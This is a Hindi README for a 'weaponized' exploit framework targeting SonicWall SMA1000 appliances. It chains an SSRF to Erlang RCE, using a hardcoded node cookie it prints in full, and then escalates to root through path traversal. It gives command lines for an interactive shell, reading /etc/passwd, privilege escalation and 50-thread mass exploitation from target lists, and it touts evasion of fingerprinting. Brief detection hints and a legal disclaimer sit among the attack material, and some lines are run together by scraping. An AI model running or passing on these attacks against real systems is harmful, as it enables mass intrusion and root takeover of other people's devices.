
SonicWall SMA1000 के लिए मल्टी-एक्सप्लॉइट फ्रेमवर्क, जो SSRF (CVE-2026-15409) को Erlang RCE और रूट विशेषाधिकार वृद्धि (CVE-2026-15410) से जोड़ता है। इसमें इंटरैक्टिव शेल, बैच स्कैनिंग, फ़ाइल संचालन, और अधिकृत पेनेट्रेशन टेस्टिंग के लिए सुरक्षित डिटेक्शन मोड शामिल हैं।

एक्सप्लॉइट फ्रेमवर्क और सुरक्षित डिटेक्शन टूल
केवल अधिकृत सुरक्षा परीक्षण के लिए।
यह टूल केवल शैक्षिक और अधिकृत पेनेट्रेशन परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
लेखक और योगदानकर्ता इस सॉफ़्टवेयर के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं हैं। उपयोगकर्ता यह सुनिश्चित करने के लिए पूर्ण रूप से ज़िम्मेदार हैं कि परीक्षण से पहले उनके पास लक्ष्य स्वामी से स्पष्ट लिखित अनुमति हो। कंप्यूटर फ्रॉड एंड एब्यूज़ एक्ट (CFAA) और दुनिया भर के समान कानूनों के तहत कंप्यूटर प्रणालियों तक अनधिकृत पहुंच अवैध है।
इस सॉफ़्टवेयर का उपयोग करके, आप निम्न बातों से सहमत होते हैं:
⚠️ चेतावनी: इस कमजोरी का वास्तविक दुनिया में सक्रिय रूप से दोहन किया जा रहा है। अनधिकृत उपयोग के गंभीर कानूनी परिणाम हो सकते हैं।
CVE-2026-15409 एक गंभीर अनधिकृत सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) कमजोरी है, जो SonicWall SMA1000 उपकरण के Work Place इंटरफ़ेस में खोजी गई थी।
यह कैसे काम करता है:
wsproxy एंडपॉइंट के माध्यम से टनल करता है।os:cmd/1 कॉल के माध्यम से रिमोट कोड एक्सेक्यूशन (RCE) प्राप्त किया जाता है।मुख्य तथ्य:
exploit.py)पूर्ण वेपनाइज़्ड एक्सप्लॉइट CVE-2026-15409 और CVE-2026-15410 को जोड़कर रूट-स्तरीय समझौता प्राप्त करता है।
pip (requests लाइब्रेरी के लिए)pip install -r requirements.txt
# Interactive shell on target
python exploit.py -u 192.168.1.100
# Execute a single command
python exploit.py -u 192.168.1.100 --exec "id && whoami"
# Read a file
python exploit.py -u 192.168.1.100 --read-file /etc/passwd
# Enable SSRF detection before exploitation
python exploit.py -u 192.168.1.100 --detect
# Attempt root privesc
python exploit.py -u 192.168.1.100 --privesc
# Mass exploit from file (50 threads)
python exploit.py -l targets.txt -m 50 --exec "uname -a"
# Custom port and path
python exploit.py -u 10.0.0.5 -p 8443 --path /workplace
# Pipe mode (read command from stdin)
echo "cat /etc/hosts" | python exploit.py -u 192.168.1.100
# Single target scan
python checker.py https://192.168.1.100
# Custom port and path
python checker.py 192.168.1.100 --port 8443 --path /workplace
# Mass scan from file
python checker.py --list targets.txt
⚠️ महत्वपूर्ण: ये कमजोरियाँ SonicWall फ़ायरवॉल (SSL-VPN) या SMA 100 सीरीज़ को प्रभावित नहीं करती हैं।
पोर्ट 443 पर wsproxy एंडपॉइंट -3389 से शुरू होने वाले bmID पैरामीटर और एक host:port विनिर्देशन स्वीकार करता है। host=127.0.0.1 और port=1050 को इंगित करके, हमलावर आंतरिक Erlang वितरण सेवा तक टनल कर सकते हैं।
Erlang नोड एक हार्डकोडेड डिफ़ॉल्ट कुकी का उपयोग करता है: 10ecad5b446e86864832904cd439b6b70262। यह रिमोट प्रमाणीकरण और किसी भी os:cmd/1 कॉल के निष्पादन की अनुमति देता है।
प्रमाणित होने के बाद, एक्सप्लॉइट /var/tmp/ में एक शेल स्क्रिप्ट लिखता है और पाथ ट्रैवर्सल (../../../../var/tmp/script.sh) के साथ AMC remove_hotfix XML-RPC एंडपॉइंट को ट्रिगर करता है, जिससे स्क्रिप्ट रूट के रूप में निष्पादित होती है।
SonicWall निम्नलिखित जाँचने की अनुशंसा करता है:
extraweb_access.log में /__api__/login या /__api__/logout (200 स्थिति) के लिएextraweb_access.log में संदिग्ध host पैरामीटर वाले /wsproxy (101 स्थिति) के लिएctrl-service.log में पाथ ट्रैवर्सल के साथ hotfix रोलबैक के लिए/var/lib/unit/conf.json जिसमें /__api__/login या /__api__/logout के रूट शामिल हों| Feature | Description |
|---|
| 🚀 SSRF → Erlang RPC | wsproxy के माध्यम से स्वचालित रूप से टनल करते हुए आंतरिक Erlang नोड्स तक पहुंचता है। |
| 💻 रिमोट कोड एक्सेक्यूशन | os:cmd/1 के माध्यम से मनमाने OS कमांड निष्पादित करें। |
| 🔐 इंटरैक्टिव शेल | privesc और download कमांड के समर्थन के साथ लाइव शेल प्रारंभ करें। |
| 👑 रूट प्रिवेस्क | AMC पाथ ट्रैवर्सल का उपयोग करके रूट तक विशेषाधिकार बढ़ाने के लिए CVE-2026-15410 का लाभ उठाता है। |
| 📁 फ़ाइल संचालन | लक्ष्य प्रणाली पर फ़ाइलें पढ़ें और लिखें। |
| 🌐 बैच स्कैनिंग | थ्रेडिंग के साथ कई लक्ष्यों का सामूहिक दोहन करें (-l फ़्लैग)। |
| 🎯 SSRF जाँच | सुरक्षित कमजोरी सत्यापन के लिए वैकल्पिक --detect फ़्लैग। |
| ⚙️ अनुकूलन योग्य | WebSocket URL, Origin, User-Agent, Cookie और अधिक ओवरराइड करें। |
| 🧩 कोई अतिरिक्त निर्भरता नहीं | केवल Python मानक लाइब्रेरी का उपयोग करता है (जाँच के लिए वैकल्पिक requests को छोड़कर)। |
| 🔌 रॉ WebSocket कार्यान्वयन | कोई बाहरी WebSocket लाइब्रेरी नहीं — कस्टम सॉकेट-स्तरीय हैंडशेक बेहतर OPSEC के लिए लाइब्रेरी-विशिष्ट सिग्नेचर फिंगरप्रिंट से बचाता है। |
| Product | Vulnerable Versions | Fixed Versions |
|---|
| SMA 6210 | 12.4.3-03245, 12.4.3-03387, 12.4.3-03434 12.5.0-02283, 12.5.0-02624, 12.5.0-02800 | 12.4.3-03453+ 12.5.0-02835+ |
| SMA 7210 | ऊपर के समान | ऊपर के समान |
| SMA 8200v | ऊपर के समान | ऊपर के समान |